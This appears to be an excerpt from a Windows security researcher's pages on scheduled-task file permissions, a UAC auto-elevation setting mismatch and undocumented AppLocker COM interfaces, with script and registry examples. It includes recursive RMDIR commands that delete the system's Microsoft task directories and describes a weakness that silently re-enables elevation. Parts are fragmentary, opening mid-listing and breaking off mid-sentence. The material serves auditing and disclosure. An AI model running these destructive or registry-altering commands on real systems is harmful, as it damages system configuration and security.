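C:\Windows\System32\Tasks\Microsoft\Windows\Input\PenSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteMouseSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemotePenSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\syncpensettings "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\TouchpadSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrinterCleanupTask "D:P(A;;FA;;;AU)(A;;FA;;;SY)"
C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrintJobCleanupTask "D:P(A;;FA;;;AU)(A;;FA;;;SY)"
C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;BU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;BU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
"""

if __name__ == "__main__":
    findings = audit(SAMPLE)
    for path, (over, dele) in sorted(findings.items()):
        print("overwrite=%-5s delete=%-5s %s" % (over, dele, path))
    print("unique: %d, overwritable: %d, deletable: %d" % ((len(findings),) + counts(findings)))
```

The DELETE check looks only at the file's own DACL; a file whose DACL withholds DELETE can still be removed when the parent directory grants FILE_DELETE_CHILD, so the DACLs of the Tasks subdirectories need the same audit.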
(Optional) Remove the subdirectories Microsoft with all their task files:
RMDIR /Q /S "%SystemRoot%\System32\Tasks\Microsoft"
RMDIR /Q /S "%SystemRoot%\SysWoW64\Tasks\Microsoft"
OUCH⁴: on all versions of Windows NT unprivileged users can delete all task files shipped with the system!
User Account Protection was the preliminary name for a core security component of Windows Vista. The component has now been officially named User Account Control (UAC).
How to disable User Account Control (UAC) on Windows Server
With Windows Vista Microsoft introduced the security feature (really: security theatre) User Account Control – programs which need or want to be run with administrative privileges and access rights have to ask the user for consent.
This made some (really: a minority of) users quite angry – although these (rather braindead) users continued to abuse the (privileged) Protected Administrator account created during Windows setup for their daily work (instead of following best practice and using an unprivileged limited alias standard user account), they had to answer a prompt whenever they wanted to perform an administrative task.
Unfortunately Microsoft heard these users and weakened the security feature (really: security nightmare) – Windows 7 introduced auto-elevation and enabled it for some 55 programs shipped with Windows 7 and later versions, which don’t prompt for consent any more.
Due to flaws in the design and deficiencies in the implementation of User Account Control it can be bypassed trivially in numerous ways with its auto-elevation (mis)feature enabled. As a result, arbitrary programs can then be run with administrative privileges and access rights without prompting the user for consent.
To defeat some of these trivial bypasses, auto-elevation must be disabled by moving the slider of the User Account Control setting to its highest position titled Always notify, as documented and shown in the MSKB articles 975787 and 4462938.
Caveat: the slider position displayed in the graphical user interface does not always match the effective setting – it shows Always notify even if the default setting Notify me only when programs try to make changes to my computer is configured!
1. Log on to the Protected Administrator user account created during Windows setup.
2. Start one of the programs which have auto-elevation enabled, for example NetPlWiz.exe, PrintUI.exe or WUSA.exe – they start without prompting for consent.
3. Open Control Panel, then User Accounts, click Change User Account Control setting, move the slider to its highest position titled Always notify and click the button to apply the new setting.
4. Run the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\GPEdit.msc" to start the Local Group Policy Editor snap-in of the Microsoft Management Console, or execute the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\SecPol.msc" to start the Local Security Policy snap-in, answer the prompt for consent, then open the Local Policies folder and the Security Options subfolder below it – the policy User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode is displayed as Prompt for consent on the secure desktop, properly matching the setting applied in step 3.
5. Repeat step 2. – auto-elevating programs prompt for consent now.
6. Start the Registry Editor RegEdit.exe, answer the prompt for consent, then open the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and delete the DWORD registry entry ConsentPromptBehaviorAdmin present there.
7. Repeat step 4. – the policy User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode is now properly displayed as Not Defined.
8. Open Control Panel, then User Accounts and click Change User Account Control setting – the slider is still displayed in its highest position Always notify.
9. Repeat step 2. – despite the unchanged slider position Always notify, auto-elevating programs don’t prompt for consent any more!
setting, but abuses a registry entry reserved for a policy instead, it misinterprets the default policy value Not Defined and violates the almost 30 (in words: thirty) year old Designed for Windows guidelines!
[HKEY_CURRENT_USER\Software\‹company›\‹application›]
"‹setting›"=‹value›
or as
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\‹application›]
"‹setting›"=‹value›
[HKEY_CURRENT_USER\Software\Policies\‹company›\‹application›]
"‹policy›"=‹value›
or as
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\‹application›]
"‹policy›"=‹value›
[HKEY_LOCAL_MACHINE\SOFTWARE\‹company›\‹application›]
"‹setting›"=‹value›
or as
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\‹application›]
"‹setting›"=‹value›
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\‹company›\‹application›]
"‹policy›"=‹value›
or as
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\‹application›]
"‹policy›"=‹value›
Get-AppLockerFileInformation, Get-AppLockerPolicy, New-AppLockerPolicy, Set-AppLockerPolicy and Test-AppLockerPolicy.
PowerShell.exe /Command "Import-Module AppLocker; Get-AppLockerFileInformation -Directory '%WINDIR%'"
PowerShell.exe /Command "Import-Module AppLocker; Get-AppLockerFileInformation -Path '%COMSPEC%'"
PowerShell.exe /Command "Import-Module AppLocker; Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path '%COMSPEC%'"
Path Publisher Hash
---- --------- ----
%WINDIR%\BFSVC.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\BFSVC.EXE,6.1.7601.17514 SHA256 0x6BF48AC00680DA7969B51835B2C823755DCE121834082CDDAE24B4AAE267A92C
%WINDIR%\EXPLORER.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\EXPLORER.EXE,6.1.7601.23537 SHA256 0xA186E53413C0A22B6BEE8A8D1BBF09550F1BEC2BF933D5DA3EFE7D42691C9EFD
%WINDIR%\FVEUPDATE.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\FVEUPDATE.EXE,6.1.7601.23403 SHA256 0x89CF83AB9D92E3B074EC3A64D091262E4537158C2BDFD47EC16A56863AEA273D
%WINDIR%\HELPPANE.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\HELPPANE.EXE,6.1.7601.23834 SHA256 0x9C1C90258267F795B092DBE74EDE34AC96FEF6C64892E0E9425E7D13193586FA
%WINDIR%\HH.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\HTML HELP\HH.EXE,6.1.7601.24134 SHA256 0x5B6F92A818791679C71EB1249F684285E807CE45FA045162EA7BBF846D7FF167
%WINDIR%\NOTEPAD.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\NOTEPAD.EXE,6.1.7601.23403 SHA256 0x4FD49DEF42CCF59968520F1A4DD9F136E7D6E3D6CEBC3C1DAC627CC0C8A34152
%WINDIR%\REGEDIT.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\REGEDIT.EXE,6.1.7600.16385 SHA256 0x053A6D9C29A8A9C4DB3600CA46F8D4C32ABFFC090C87726DA5CA2EC8E068EAD1
%WINDIR%\SPLWOW64.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\SPLWOW64.EXE,6.1.7601.23403 SHA256 0xEC19AE82CFF53F3EC05D231F115DA50BEA81753A2B2E335DEBF41E4560FFEAD5
%WINDIR%\TWUNK_16.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\\,0.0.0.0 SHA256 0x103035A32E7893D702CED974FAA4434828BC03B0CC54D1B2E1205A2F2575E7C9
%WINDIR%\TWUNK_32.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\TWAIN THUNKER\TWUNK_32.EXE,1.7.1.0 SHA256 0x5E0831E4568A673CB23B955D30132D58669F6BF5FDBBA52693C0AEB9C72B5881
%WINDIR%\WINHLP32.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\WINHLP32.EXE,50.1.7600.16386 SHA256 0x0C2FD81A6ADBF6B48B18555B1D29192EE3DAB61631EA447714DFCF7FF0F321F1
%WINDIR%\WRITE.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\WRITE,6.1.7600.16385 SHA256 0xD1635E8EEE2979A4FBA988CAE2BA8FFB700FC78109FC1C38DCE8B4AC9E8FF402
%WINDIR%\TWAIN.DLL O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\\,0.0.0.0 SHA256 0x3D922F8B608401AF4F34F71DBACFA458CEF1F7BFFFEDD7FEBEE0A968E51D6DCE
%WINDIR%\TWAIN_32.DLL O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\TWAIN_32 SOURCE MANAGER\TWAIN_32.DLL,1.7.1.3 SHA256 0x7E2FADCA8D0C5A279B2CD058D6C44D0FF2945286FFF7B0EADFF7D9D61314BE29

Path Publisher Hash
---- --------- ----
%SYSTEM32%\CMD.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\CMD.EXE,6.1.7601.23403 SHA256 0x7B78775AEC2C6D6C74CB7D431097A4018A9C6016E1B02CB0C7B2DD5C00B45267

FilePath PolicyDecision MatchingRule
-------- -------------- ------------
C:\Windows\system32\cmd.exe AllowedByDefault
Their implementation uses methods from the (undocumented) COM interface
IAppIdPolicyHandler of the scriptable COM class AppIdPolicyHandler and from the (undocumented) COM interface IAppIdPolicyHelper of the scriptable COM class AppIdPolicyHelper, both provided by %SystemRoot%\System32\AppIdPolicyEngineApi.dll via IID {B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}, CLSID {F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3} and ProgID AppIdPolicyEngineApi.AppIdPolicyHandler respectively IID {D500522D-465B-4C83-8008-00C4EC90A859}, CLSID {0AEA3667-1039-43FF-8D21-B1A162090671} and ProgID AppIdPolicyEngineApi.AppIdPolicyHelper:
REG.EXE QUERY HKCR\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D} /S
REG.EXE QUERY HKCR\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3} /S
REG.EXE QUERY HKCR\AppIdPolicyEngineApi.AppIdPolicyHandler /S
REG.EXE QUERY HKCR\AppIdPolicyEngineApi.AppIdPolicyHandler.1 /S
REG.EXE QUERY HKCR\Interface\{D500522D-465B-4C83-8008-00C4EC90A859} /S
REG.EXE QUERY HKCR\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671} /S
REG.EXE QUERY HKCR\AppIdPolicyEngineApi.AppIdPolicyHelper /S
REG.EXE QUERY HKCR\AppIdPolicyEngineApi.AppIdPolicyHelper.1 /S
HKEY_CLASSES_ROOT\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}
(Default) REG_SZ IAppIdPolicyHandler
HKEY_CLASSES_ROOT\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}\ProxyStubClsid
(Default) REG_SZ {00020424-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}\ProxyStubClsid32
(Default) REG_SZ {00020424-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}\TypeLib
(Default) REG_SZ {85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E}
Version REG_SZ 1.0
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}
(Default) REG_SZ AppIdPolicyHandler Class
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\InprocServer32
(Default) REG_SZ C:\Windows\System32\AppIdPolicyEngineApi.dll
ThreadingModel REG_SZ Apartment
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\ProgID
(Default) REG_SZ AppIdPolicyEngineApi.AppIdPolicyHandler.1
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\Programmable
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\TypeLib
(Default) REG_SZ {85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E}
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\Version
(Default) REG_SZ 1.0
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\VersionIndependentProgID
(Default) REG_SZ AppIdPolicyEngineApi.AppIdPolicyHandler
ERROR: The specified registry key or value was not found.
ERROR: The specified registry key or value was not found.
HKEY_CLASSES_ROOT\Interface\{D500522D-465B-4C83-8008-00C4EC90A859}
(Default) REG_SZ IAppIdPolicyHelper
HKEY_CLASSES_ROOT\Interface\{D500522D-465B-4C83-8008-00C4EC90A859}\ProxyStubClsid
(Default) REG_SZ {00020424-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\Interface\{D500522D-465B-4C83-8008-00C4EC90A859}\ProxyStubClsid32
(Default) REG_SZ {00020424-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\Interface\{D500522D-465B-4C83-8008-00C4EC90A859}\TypeLib
(Default) REG_SZ {85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E}
Version REG_SZ 1.0
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}
(Default) REG_SZ AppIdPolicyHelper Class
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\InprocServer32
(Default) REG_SZ C:\Windows\System32\AppIdPolicyEngineApi.dll
ThreadingModel REG_SZ Apartment
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\ProgID
(Default) REG_SZ AppIdPolicyEngineApi.AppIdPolicyHelper.1
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\Programmable
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\TypeLib
(Default) REG_SZ {85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E}
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\Version
(Default) REG_SZ 1.0
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\VersionIndependentProgID
(Default) REG_SZ AppIdPolicyEngineApi.AppIdPolicyHelper
ERROR: The specified registry key or value was not found.
ERROR: The specified registry key or value was not found.
OOPS: neither the version-independent nor the versioned ProgIDs are registered!
AppIdPolicyHandler and AppIdPolicyHelper with Windows Script Host.
1. Execute the OLE/COM Object Viewer application OLEView.exe shipped with the Windows SDK to generate the interface description:
OLEVIEW.EXE "%SystemRoot%\System32\AppIdPolicyEngineApi.dll"
// Generated .IDL file (by the OLE/COM Object Viewer)
//
// typelib filename: AppIdPolicyEngineApi.dll
[
uuid(85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E),
version(1.0),
helpstring("AppIdPolicyEngineApi 1.0 Type Library")
]
library AppIdPolicyEngineApiLib
{
// TLib : // TLib : OLE Automation : {00020430-0000-0000-C000-000000000046}
importlib("stdole2.tlb");
// Forward declare all types defined in this typelib
interface IAppIdPolicyHandler;
interface IAppIdMmcPolicyHandler;
interface IAppIdPolicyHelper;
[
uuid(F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3),
helpstring("AppIdPolicyHandler Class")
]
coclass AppIdPolicyHandler {
[default] interface IAppIdPolicyHandler;
};
[
odl,
uuid(B6FEA19E-32DD-4367-B5B7-2F5DA140E87D),
helpstring("IAppIdPolicyHandler Interface"),
dual,
nonextensible,
oleautomation
]
interface IAppIdPolicyHandler : IDispatch {
[id(0x00000001), helpstring("method SetPolicy")]
HRESULT SetPolicy(
[in] BSTR bstrLdapPath,
[in] BSTR bstrXmlPolicy);
[id(0x00000002), helpstring("method GetPolicy")]
HRESULT GetPolicy(
[in] BSTR bstrLdapPath,
[out, retval] BSTR* pbstrXmlPolicy);
[id(0x00000003), helpstring("method GetEffectivePolicy")]
HRESULT GetEffectivePolicy([out, retval] BSTR* pbstrXmlPolicy);
[id(0x00000004), helpstring("method IsFileAllowed")]
HRESULT IsFileAllowed(
[in] BSTR bstrXmlPolicy,
[in] BSTR bstrFilePath,
[in] BSTR bstrUserSid,
[out] GUID* pguidResponsibleRuleId,
[out, retval] long* pbStatus);
};
[
uuid(5971EC44-072A-41B7-8E67-D9E045CC196D),
helpstring("AppIdMmcPolicyHandler Class")
]
coclass AppIdMmcPolicyHandler {
[default] interface IAppIdMmcPolicyHandler;
};
[
odl,
uuid(B780009A-2622-46E4-A23C-33E8D0990B27),
helpstring("IAppIdMmcPolicyHandler Interface"),
dual,
nonextensible,
oleautomation
]
interface IAppIdMmcPolicyHandler : IDispatch {
[id(0x00000001), helpstring("method Register")]
HRESULT Register(
[in] IUnknown* pGPEInformation,
[out, retval] GUID* pguidClientId);
[id(0x00000002), helpstring("method Unregister")]
HRESULT Unregister([in] GUID guidClientId);
[id(0x00000003), helpstring("method SetPolicy")]
HRESULT SetPolicy(
[in] GUID guidClientId,
[in] BSTR bstrXmlPolicy);
[id(0x00000004), helpstring("method GetPolicy")]
HRESULT GetPolicy(
[in] GUID guidClientId,
[out, retval] BSTR* pbstrXmlPolicy);
};
[
uuid(0AEA3667-1039-43FF-8D21-B1A162090671),
helpstring("AppIdPolicyHelper Class")
]
coclass AppIdPolicyHelper {
[default] interface IAppIdPolicyHelper;
};
[
odl,
uuid(D500522D-465B-4C83-8008-00C4EC90A859),
helpstring("IAppIdPolicyHelper Interface"),
dual,
nonextensible,
oleautomation
]
interface IAppIdPolicyHelper : IDispatch {
[id(0x00000001), helpstring("method GetFileType")]
HRESULT GetFileType(
[in] BSTR bstrFilePath,
[out, retval] FILE_TYPE* peFileType);
[id(0x00000002), helpstring("method GetFileRuleCollection")]
HRESULT GetFileRuleCollection(
[in] FILE_TYPE eFileType,
[out, retval] BSTR* pbstrRuleCollection);
[id(0x00000003), helpstring("method GetFileExtensions")]
HRESULT GetFileExtensions(
[in] FILE_TYPE eFileType,
[out, retval] BSTR* pbstrFileExtesnions);
[id(0x00000004), helpstring("method CalculateFileHash")]
HRESULT CalculateFileHash(
[in] BSTR bstrFilePath,
[out, retval] SAFEARRAY(unsigned char)* ppsabHashData);
[id(0x00000005), helpstring("method CalculateFilePublisher")]
HRESULT CalculateFilePublisher(
[in] BSTR bstrFilePath,
[out] BSTR* pbstrPublisherName,
[out] BSTR* pbstrProductName,
[out] BSTR* pbstrBinaryName,
[out] uint64* pulBinaryVersion);
[id(0x00000006), helpstring("method NormalizeFilePath")]
HRESULT NormalizeFilePath(
[in] BSTR bstrFilePath,
[out, retval] BSTR* pbstrNormalizedFilePath);
[id(0x00000007), helpstring("method EncodeFilePublisherInformation")]
HRESULT EncodeFilePublisherInformation(
[in] BSTR bstrInformation,
[in] long bIngoreWildCharacters,
[out, retval] BSTR* pbstrEncodedInformation);
[id(0x00000008), helpstring("method DecodeFilePublisherInformation")]
HRESULT DecodeFilePublisherInformation(
[in] BSTR bstrInformation,
[out, retval] BSTR* pbstrDecodedInformation);
[id(0x00000009), helpstring("method CompileRule")]
HRESULT CompileRule(
[in] BSTR bstrXmlRule,
[out, retval] BSTR* pbstrCompiledRule);
};
typedef [helpstring("FileType")public]
__MIDL___MIDL_itf_appidpolicyengineapi_0000_0000_0001 FILE_TYPE;
typedef [helpstring("FileType")]
enum {
FILE_TYPE_NOT_SUPPORTED = 0,
FILE_TYPE_EXE = 1,
FILE_TYPE_DLL = 2,
FILE_TYPE_WINDOWS_INSTALLER = 3,
FILE_TYPE_SCRIPT = 4
} __MIDL___MIDL_itf_appidpolicyengineapi_0000_0000_0001;
};
2. Create the text file whisper.wsf with the following content in an arbitrary, preferably empty directory:
<?xml version='1.0' encoding='US-ASCII' standalone='yes' ?>
<package>
<comment>Copyright (C) 2009-2026, Stefan Kanthak</comment>
<job id='Handler'>
<object id='AppIdPolicyHandler' classid='clsid:F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3' />
<script language='JScript'>
<![CDATA[
WScript.Echo(AppIdPolicyHandler.GetEffectivePolicy())
WScript.Echo(AppIdPolicyHandler.GetPolicy(""))
// WScript.Echo(AppIdPolicyHandler.SetPolicy("", "<AppLockerPolicy Version='1' />"))
WScript.Quit(0)
]]>
</script>
</job>
<job id='Helper'>
<object id='AppIdPolicyHelper' classid='clsid:0AEA3667-1039-43FF-8D21-B1A162090671' />
<reference guid='85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E' />
<script language='VBScript'>
<![CDATA[
Option Explicit
With AppIdPolicyHelper
WScript.Echo .GetFileType(WScript.ScriptName) & vbTab & WScript.ScriptName
WScript.Echo .GetFileType(WScript.FullName) & vbTab & WScript.FullName
WScript.Echo .GetFileType(WScript.Path) & vbTab & WScript.Path
WScript.Echo
WScript.Echo .GetFileRuleCollection(FILE_TYPE_EXE) & vbTab & .GetFileExtensions(FILE_TYPE_EXE)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_DLL) & vbTab & .GetFileExtensions(FILE_TYPE_DLL)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_WINDOWS_INSTALLER) & vbTab & .GetFileExtensions(FILE_TYPE_WINDOWS_INSTALLER)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_SCRIPT) & vbTab & .GetFileExtensions(FILE_TYPE_SCRIPT)
WScript.Echo
WScript.Echo WScript.ScriptName & " = " & .NormalizeFilePath(WScript.ScriptName)
WScript.Echo WScript.FullName & " = " & .NormalizeFilePath(WScript.FullName)
WScript.Echo
WScript.Echo Hash2Text(.CalculateFileHash(WScript.ScriptName))
WScript.Echo Hash2Text(.CalculateFileHash(WScript.FullName))
WScript.Echo
WScript.Echo .DecodeFilePublisherInformation("CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US")
WScript.Echo .EncodeFilePublisherInformation("CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US", vbTrue)
WScript.Echo
WScript.Echo .CompileRule("<FilePathRule Action='Allow' Description='' Id='00000000-0000-0000-0000-000000000000' Name='' UserOrGroupSid='S-1-5-32-544'><Conditions><FilePathCondition Path='*' /></Conditions></FilePathRule>")
WScript.Echo .CompileRule("<FilePublisherRule Action='Allow' Description='' Id='00000000-0000-0000-0000-000000000000' Name='' UserOrGroupSid='S-1-1-0'><Conditions><FilePublisherCondition BinaryName='*' ProductName='*' PublisherName='CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US'><BinaryVersionRange HighSection='65535.65535.65535.65535' LowSection='0.0.0.0' /></FilePublisherCondition></Conditions></FilePublisherRule>")
End With
WScript.Quit 0
Function Hash2Text(Hash)
Dim int, asc, str
For int = 1 To LenB(Hash)
asc = AscB(MidB(Hash, int, 1))
If asc < 16 Then str = str & "0"
str = str & Hex(asc)
Next
Hash2Text = str
End Function
]]>
</script>
</job>
</package>
Execute the JScript from the first job of the Windows Script File whisper.wsf created in step 2. to demonstrate the handler methods:
CSCRIPT.EXE //Job:Handler whisper.wsf
Microsoft (R) Windows Script Host, Version 5.8
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
<AppLockerPolicy Version="1"/>
<AppLockerPolicy Version="1"/>
Execute the VBScript from the second job of the Windows Script File whisper.wsf created in step 2. to demonstrate the helper methods:
CSCRIPT.EXE //Job:Helper whisper.wsf
Microsoft (R) Windows Script Host, Version 5.8
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
0 whisper.wsf
1 C:\Windows\System32\cscript.exe
0 C:\Windows\System32
Exe com,exe
Dll dll
Msi msi,msp
Script bat,cmd,js,ps1,vbs
whisper.wsf = %OSDRIVE%\USERS\STEFAN\DESKTOP\WHISPER.WSF
C:\Windows\System32\cscript.exe = %SYSTEM32%\CSCRIPT.EXE
C7AFE4127307150B2E024FB1EFCFE33C4F2BFCAAFBDA74E5E161233022BA0327
0A242026DA1DF243E88C2D56FC7A77CF04F65513075968F010E213046E64465E
CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
D:(XA;;FX;;;BA;(APPID://PATH Contains "*"))
D:(XA;;FX;;;WD;((Exists APPID://FQBN) && ((APPID://FQBN >= {"CN=MICROSOFT CORPORATION, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*\*", 0}) && (APPID://FQBN <= {"CN=MICROSOFT CORPORATION, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*\*", 18446744073709551615}))))
REG.EXE IMPORT whisper.reg
The operation completed successfully.
Create the text file whisper.vbs with the following
content in the same directory:
Rem Copyright © 2009-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
Option Explicit
Const strLDAPPath = "" ' ldap://ad-dc.example.org/CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=Example,DC=Org
Const strXMLPolicy = "<AppLockerPolicy Version='1' />"
With WScript.CreateObject("AppIdPolicyEngineApi.AppIdPolicyHandler")
WScript.Echo .GetEffectivePolicy
WScript.Echo .GetPolicy(strLDAPPath)
' WScript.Echo .SetPolicy(strLDAPPath, strXMLPolicy)
End With
Register the missing ProgIDs AppIdPolicyEngineApi.AppIdPolicyHandler and AppIdPolicyEngineApi.AppIdPolicyHandler.1, then execute the VBScript whisper.vbs created in step 6. to display the AppLocker policies again:
REG.EXE ADD HKCR\AppIdPolicyEngineApi.AppIdPolicyHandler\CurVer /VE /T REG_SZ /D AppIdPolicyEngineApi.AppIdPolicyHandler.1
REG.EXE ADD HKCR\AppIdPolicyEngineApi.AppIdPolicyHandler.1\CLSID /VE /T REG_SZ /D {F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}
CSCRIPT.EXE whisper.vbs
Note: the command lines can be copied and pasted as
block into a Command Processor window.
The operation completed successfully.
The operation completed successfully.
Microsoft (R) Windows Script Host, Version 5.8
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
<AppLockerPolicy Version="1"/>
<AppLockerPolicy Version="1"/>
Overwrite the text file whisper.vbs created in
step 5. with the following content:
Rem Copyright © 2009-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
Option Explicit
Const FILE_TYPE_NOT_SUPPORTED = 0
Const FILE_TYPE_EXE = 1
